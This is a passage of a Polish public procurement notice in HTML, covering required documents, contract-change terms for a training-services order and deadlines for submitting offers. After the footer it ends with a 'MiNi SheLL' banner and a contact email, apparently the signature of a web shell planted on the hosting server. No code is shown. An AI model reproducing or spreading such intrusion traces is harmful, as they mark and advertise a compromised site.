ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (załącznik nr 3 do SWZ);<br/>3)	zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt 1 Ustawy PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>4)	zaświadczenia albo innego dokumentu właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 Ustawy PZP, wystawionego nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz z zaświadczeniem albo innym dokumentem zamawiający żąda złożenia dokumentów potwierdzających, że odpowiednio przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu albo przed upływem terminu składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat tych należności;<br/>5)	odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności, w zakresie art. 109 ust. 1 pkt 4 Ustawy PZP, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji; <br/>6)	oświadczenia wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 Ustawy PZP, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, o których mowa w: <br/>a)	art. 108 ust. 1 pkt 3 Ustawy PZP, <br/>b)	art. 108 ust. 1 pkt 4 Ustawy PZP, dotyczących orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka zapobiegawczego, <br/>c)	art. 108 ust. 1 pkt 5 Ustawy PZP, dotyczących zawarcia z innymi wykonawcami porozumienia mającego na celu zakłócenie konkurencji, <br/>d)	art. 108 ust. 1 pkt 6 Ustawy PZP, <br/>e)	art. 109 ust. 1 pkt 1 ustawy, odnośnie do naruszenia obowiązków dotyczących płatności podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2019 r. poz. 1170)<br/>- zgodnie z załącznikiem nr 6 do SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zmiany treści umowy wymagają formy pisemnej lub równoważnej formie pisemnej (opatrzonej kwalifikowanymi podpisami elektronicznymi) pod rygorem nieważności, z wyłączeniem przypadków określonych w umowie.<br/>2.	Zamawiający przewiduje możliwość wprowadzenia zmian do umowy w zakresie:<br/>1) przedłużenia terminów wykonania umowy określonych w § 2 ust. 1 w przypadku: <br/>a)	wystąpienia okoliczności, trudnych do przewidzenia w chwili zawarcia umowy, a które uniemożliwiają wykonanie umowy w terminach określonych w § 2 ust. 1 i które są niezawinione przez Wykonawcę, w tym w szczególności okoliczności, powstających na skutek zdarzeń losowych, siły wyższej lub zagrożenia epidemicznego, zaś ich skutki mają przełożenie na terminową realizację zamówienia, <br/>b)	braku wystarczającej liczby (w zakresie do pełnego 1000 uczestników szkoleń) chętnych do udziału w szkoleniach lub ich rezygnacji w poszczególnych szkoleniach;<br/>c)	wystąpienia opóźnień po stronie Zamawiającego, które uniemożliwiają Wykonawcy realizację przedmiotu umowy w terminie, określonym w § 2 ust. 1,<br/>d)	wydłużenia terminu realizacji projektu - odpowiednio do zaistniałych okoliczności lub opóźnień po stronie Zamawiającego, ale nie więcej niż o 33% terminu (obliczonego w dniach, zaczynając od dnia zawarcia umowy, a kończąc na dniu 30 września 2022 r.), zaokrąglając do pełnego dnia w górę;<br/>2) zmiany sposobu wykonania, przeprowadzenia lub przebiegu szkoleń w przypadku wystąpienia okoliczności, trudnych do przewidzenia w chwili zawarcia umowy, a które uniemożliwiają lub utrudniają wykonanie umowy i które są niezawinione przez Wykonawcę, w tym w szczególności okoliczności powstających na skutek zdarzeń losowych, siły wyższej lub zagrożenia epidemicznego, zaś ich skutki mają bezpośrednie przełożenie na realizację poszczególnych szkoleń;<br/>3) przeniesienie realizacji maksymalnie do: <br/>a) 7 szkoleń w odniesieniu do liczby szkoleń, które mają się odbyć do końca 31 grudnia 2021 r.,<br/>b) 9 szkoleń w odniesieniu do liczby szkoleń, które mają się odbyć do końca 30 września 2022 r. - na późniejszy termin niż odpowiednio do końca 31 grudnia 2021 r. lub 30 września 2022 r. w przypadku braku chęci udziału w szkoleniach uczestników lub ich rezygnacji w poszczególnych szkoleniach odpowiednio w terminach do końca 31 grudnia 2021 r. lub 30 września 2022 r. nie dłużej niż do pierwszego dnia przedostatniego miesiąca w stosunku do ostatniego miesiąca zakończenia terminu realizacji projektu (włącznie z przypadkiem wydłużenia terminu realizacji projektu, po dniu zawarcia umowy). Wynagrodzenie zostanie odpowiednio dostoswane do liczby przeprowadzonych szkoleń i ich uczestników, przy czym zostanie ustalone w oparciu o cenę dla jednego uczestnika szkolenia wskazaną w § 4 ust. 1;<br/>4) rezygnacji z realizacji maksymalnie do: <br/>a) 5 szkoleń w odniesieniu do liczby szkoleń, które mają się odbyć do końca 31 grudnia 2021 r.,<br/>b) 7 szkoleń w odniesieniu do liczby szkoleń, które mają się odbyć do końca 30 września 2022 r. - w przypadku braku chęci udziału w szkoleniach uczestników. Wynagrodzenie Wykonawcy zostanie wówczas odpowiednio pomniejszone o liczbę szkoleń i ich uczestników, które nie zostaną zrealizowane;<br/>Szczegółowe zapisy dotyczące zmiany umowy wskazano w § 12 PPU załącznik nr 7 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-12 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://zamowienia-mz.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-12 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-10</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-15 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com